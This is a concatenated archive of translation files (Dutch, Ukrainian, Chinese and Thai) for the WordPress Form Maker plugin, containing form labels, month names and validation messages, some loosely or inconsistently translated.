#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "veld is verplicht."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Dit is geen geldig e-mailadres."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Je kunt geen vroegere data te selecteren. Kies een datum vanaf het huidige."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "Den"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "værdi skal være mellem"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Mængde"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Din score skal være mindre end"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Titel"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Voornaam"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Achternaam"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Middelhoog"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Netnummer"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Telefoonnummer"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dollars"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Cents"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Fra"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Til"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "gaan "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Reset "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Selecteer een veld "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Kies een Datum"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-uk_UA.mo000060400000011044152434416630012177 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
P
`
o
|

�
�
�
d�
G7`
��������!42gx�����

V/
(�
�
�
�
=�
x9�
��<��V�O�^GE���>�;�(�4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:05+0400
PO-Revision-Date: 2015-05-22 17:06+0400
Last-Translator: 
Language-Team: 
Language: uk
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
КвітеньКод зониСерпеньЦентівСітіКраїна:ГруденьДоларів. Помилка, адреса електронної пошти не був відправлений.Помилка, файл не може бути переміщений.Помилка, невірний код безпеки.ЛютийПершийВідперейти СіченьЛипеньЧервеньОстаннійБерезеньТравеньСереднійНічого не було представлено.ЛистопадЖовтеньНомер телефону:Поштовий / ІндексКількістьСкидання Виберіть ДатаВиберіть поле ВересеньНа жаль, ви не можете завантажити цей тип файлу.Штат / Область / регіонАдресаАдреса рядок 2TheФайл перевищує допустимий розмірЦе поле %s вимагає унікальну запис, і ця величина вже представлені.Це не адреса електронної пошти.НазваДляПеревірка посилання є недійсним.Ви не можете вибрати колишніх дати. Виберіть дату, починаючи з поточного.Вашу адресу електронної пошти вже перевірений.Ваше повідомлення було успішно перевірено.Вашу адресу електронної пошти підтвердження минув.Ваша форма була успішно представлена.Ваш IP занесений в чорний список. Будь ласка, зверніться до адміністратора сайту. Ваша оцінка повинна бути не менше поле обов'язкове для заповнення.Значення має бути між languages/form_maker-zh_CN.mo000060400000007000152434416630012171 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
	H
R
Y
`

g
	u

!�
�
$�
�
�
�
�

$	+5	HRYfsz���6����D6-{���?�$

$2
$W
|
8�
�
�
�
4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:06+0400
PO-Revision-Date: 2015-05-22 17:06+0400
Last-Translator: 
Language-Team: 
Language: zh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
四月区域码八月美分城市国家/地区十二月美元错误,电子邮件未发送。错误,文件不能移动。错误,不正确的安全代码。二月第一从去 一月七月六月Last三月五月中间名没有被提交。十一月十月电话号码邮政编码数量重置选择日期选择一个字段 九月对不起,您不允许上传这种类型的文件。国家/省/地区街道地址街道地址2号线该文件超过了允许的大小这一领域的%s需要一个独特的项目,并已提交此值。这不是一个有效的电子邮件地址。标题为了驗證鏈接無效。你不能選擇前者日期。選擇從當前開始的日期。您的電子郵件地址已驗證。您的電子郵件已成功驗證。您的電子郵件驗證已超時。成功提交表单。您的IP被列入黑名单。请与网站管理员联系你的分数应小于 需要字段值必须介于 languages/form_maker-th.po000060400000062265152434416630011624 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:05+0400\n"
"PO-Revision-Date: 2015-05-22 17:05+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: th\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "ถนนที่อยู่"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "ที่อยู่บรรทัดที่ 2 ถนน"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "เมือง"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "รัฐ / จังหวัด / ภาค"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "รหัสไปรษณีย์ / Zip"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "ประเทศ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "มกราคม"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "กุมภาพันธ์"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "มีนาคม"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "เมษายน"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "พฤษภาคม"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "มิถุนายน"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "กรกฎาคม"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "สิงหาคม"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "กันยายน"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "ตุลาคม"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "พฤศจิกายน"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "ธันวาคม"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "รหัสข้อผิดพลาดการรักษาความปลอดภัยที่ไม่ถูกต้อง"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "ip ของคุณจะถูกขึ้นบัญชีดำ กรุณาติดต่อผู้ดูแลเว็บไซต์ "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "ไฟล์เกินขนาดที่อนุญาตจาก"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "ขออภัยคุณไม่ได้รับอนุญาตให้อัปโหลดไฟล์ประเภทนี้"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "ข้อผิดพลาด, ไฟล์ไม่สามารถย้าย"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid "This field %s requires a unique entry and this value was already submitted."
msgstr "เขตนี้ %s ต้องการรายการที่ไม่ซ้ำกันและความคุ้มค่านี้ได้แสดงความคิดเห็นไว้แล้ว"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "ข้อผิดพลาดอีเมลไม่ได้ส่ง"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "ไม่มีสิ่งใดถูกแสดงความคิดเห็น"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "รูปแบบของคุณถูกส่งเรียบร้อยแล้ว"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "ข้อผิดพลาดอีเมลไม่ได้ส่ง"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "ที่อยู่อีเมลของคุณที่มีการยืนยันแล้ว"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "อีเมล์ของคุณได้รับการยืนยันที่ประสบความสำเร็จ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "ตรวจสอบอีเมล์ของคุณได้หมดเวลา"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "การเชื่อมโยงการตรวจสอบไม่ถูกต้อง"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
